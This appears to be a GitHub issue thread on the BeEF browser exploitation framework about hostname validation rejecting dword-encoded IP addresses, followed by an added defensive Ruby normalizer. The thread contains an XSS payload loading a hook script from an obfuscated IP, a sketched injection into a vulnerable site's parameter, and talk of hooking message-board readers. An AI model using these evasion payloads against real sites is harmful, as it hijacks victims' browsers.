Closed iBringsTheRuckus closed 11 years ago
It doesn't allow me to show the script tags etc.
That's a filtering rule we added. Have a look here: /beef/core/filters/http.rb, line 22, where the method to validate the hostname is given. It's not a blocking error, anyway.
What do you mean "It doesn't allow me to show the script tags etc."? If you mean in the admin web UI, it's because I'm doing output escaping on the data that is rendered.
It would be nice to at least have the option from a penetration tester's standpoint. Looking at the filtering, since it's just all numbers, should it be allowed even without a ".", right?
Nah, look at the last 2 lines:

```ruby
# reject hostnames containing ".." or "--" (the backslashes were eaten by markdown above; the literal-dot form is intended)
return false if not (str =~ /\.\./).nil?
return false if not (str =~ /--/).nil?
```
but yes I will patch it, you are right. Even though I never considered the hostname encoded in that way to be an obfuscation technique :D
Thanks a lot. Yeah, it seems quite nice since it's just a set of numbers after the http. =P Please let me know when it's ready to update. Thanks again!
Wait a sec. Tried now in latest FF and Chrome.
In FF after hooking http://2130706433:3000/demos/basic.html I see no errors printed. In Chrome neither (even though in webkit that dword address is automatically translated to the original value).
Which environment do you have (victim browser)?
FF 15.0.1. That's not good that Chrome translates it. I might want to try other browsers with dword, hex, & octal. It works fine if you input it right into the browser. But say you use it as an XSS in a vulnerable site and hand the link to the victim. That is when I get the error. Give it a try in a vuln app: `site.com/index.php?blah=ScriptHerehttp://dword/hook.jsCloseScript`
Did a little testing with it being put directly into the browser. Chrome does detect all 3, except dword with a value of 1, but it just doesn't work. Works on Firefox and IE, except IE does translate it too. I did some thinking though, and am thinking: what if you use it like the above example in an XSS, will it actually translate it after it loads? I think it would also work great in something like a post on a message board. I don't know, I guess I would have to do some testing after I update with the fix.
Let me know how it goes mate, so I can push a final patch. To allow dword addresses it is enough to add:

```ruby
return true if (str =~ /^[0-9]/)
```

after line 25 of core/filters/http.rb
For the other encoding techniques we'll see.
I still get the same error. ='(
So 'is_valid_hostname?' is still returning false?
Closing the bug as there is no response or replication.
Will do. Sorry for the delay as my life has been a little fucked up lately. I'll check it out some time over the weekend. Thanks

On Oct 1, 2012 3:36 AM, "Michele Orru" notifications@github.com wrote:

> Let me know how it goes mate, so I can push a final patch. To allow dword addresses it is enough to add:
> `return true if (str =~ /^[0-9]/)`
> after line 25 of core/filters/http.rb
> For the other encoding techniques we'll see.
> — Reply to this email directly or view it on GitHub: https://github.com/beefproject/beef/issues/751#issuecomment-9024835
Hello,
I was trying some different ways to hide the IP address etc. with BeEF in a real world scenario and I keep getting an error: `[2012-09-29 03:33:57] ERROR Invalid host name`. This error happens when the XSS is successful and tries to connect back to BeEF. I'm using an IP Obfuscation Calculator with a DWord level 1 address like this `<SCRIPT/SRC="http://6425673729/hook.js">`, but BeEF doesn't seem to understand it and gives me the above error. I put the address `http://6425673729/ui/panel` into my browser and it loads fine as a test for the IP. I tried `http://6425673729/hook.js` in the browser and as an XSS and I get the error. It seems the problem is with BeEF understanding the IP. I have also tested an octal address and that doesn't work either. I haven't tested a hex address.
Here is the link to the calculator I'm using. It's at the bottom of the page. http://ha.ckers.org/xsscalc.html Here is a little more on the subject and how it's used. https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Dword_encoding
All testing was done on a Windows system with the latest version of Firefox.
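As an added illustration (not BeEF's own code and not from anyone in this thread), here is a validator in the spirit of the `is_valid_hostname?` filter discussed in the patch comment above, extended to accept the numeric dword form the reporter hit, together with a normalizer that maps the dword, hex and octal spellings from the cheat sheet to canonical dotted-quad form so that logs and allow-lists can be compared on one value. The names `valid_hostname?`, `normalize_ipv4` and `parse_part` are mine. It uses an anchored `\A[0-9]+\z` rather than the `/^[0-9]/` of the proposed patch, which would also accept any multi-line string merely starting with a digit.

```ruby
# Added example, not BeEF's code. Validate a Host value the way the filter in
# core/filters/http.rb does (letters, digits, dots, hyphens; no ".." or "--"),
# and additionally accept a purely numeric (dword) host.
def valid_hostname?(str)
  return false unless str.is_a?(String) && !str.empty?
  return false if str.length > 255
  # dword form such as "2130706433": the whole string must be digits
  return true if str =~ /\A[0-9]+\z/
  return false unless str =~ /\A[a-zA-Z0-9.-]+\z/
  return false unless (str =~ /\.\./).nil?
  return false unless (str =~ /--/).nil?
  true
end

# Parse one dot-separated part: 0x-prefixed hex, leading-zero octal, or decimal.
# Returns nil for anything that is not a number (so real hostnames fall through).
def parse_part(p)
  case p
  when /\A0[xX][0-9a-fA-F]+\z/ then p.to_i(16)
  when /\A0[0-7]+\z/           then p.to_i(8)   # leading zero: octal
  when /\A0[0-9]+\z/           then nil         # "08", "09": not valid octal
  when /\A[0-9]+\z/            then p.to_i(10)
  else nil
  end
end

# Normalize the IPv4 spellings a browser resolves (dotted quad, dword, hex,
# octal, and short forms such as "127.1") into canonical "a.b.c.d".
# Returns nil when the string is not a numeric IPv4 form.
def normalize_ipv4(str)
  return nil unless str.is_a?(String)
  parts = str.split('.', -1)
  return nil if parts.empty? || parts.length > 4 || parts.any?(&:empty?)
  values = parts.map { |p| parse_part(p) }
  return nil if values.any?(&:nil?)

  if values.length == 1
    # Pure dword. The calculator's "level N" adds N * 2**32 (6425673729 is
    # 127.0.0.1 at level 1); older browsers wrapped at 32 bits, so reduce
    # modulo 2**32 when canonicalising for log comparison.
    n = values[0] & 0xFFFFFFFF
  else
    # With k parts the last part supplies the remaining (5-k)*8 bits.
    *head, last = values
    last_bits = (5 - values.length) * 8
    return nil if head.any? { |v| v > 0xFF }
    return nil if last >= (1 << last_bits)
    n = 0
    head.each { |v| n = (n << 8) | v }
    n = (n << last_bits) | last
  end
  [24, 16, 8, 0].map { |s| (n >> s) & 0xFF }.join('.')
end

if __FILE__ == $PROGRAM_NAME
  # constructed sample values, covering the forms mentioned in the thread
  %w[2130706433 6425673729 0x7f000001 017700000001 127.1 example.com].each do |h|
    puts "#{h.ljust(14)} valid=#{valid_hostname?(h)} canonical=#{normalize_ipv4(h).inspect}"
  end
end
```

Run it with `ruby hostname_filter.rb`; the point for a defender is that the validator decides what BeEF (or any listener) accepts, while the normalizer is what you log and compare, so an obfuscated hook URL still shows up as the same address as the plain one.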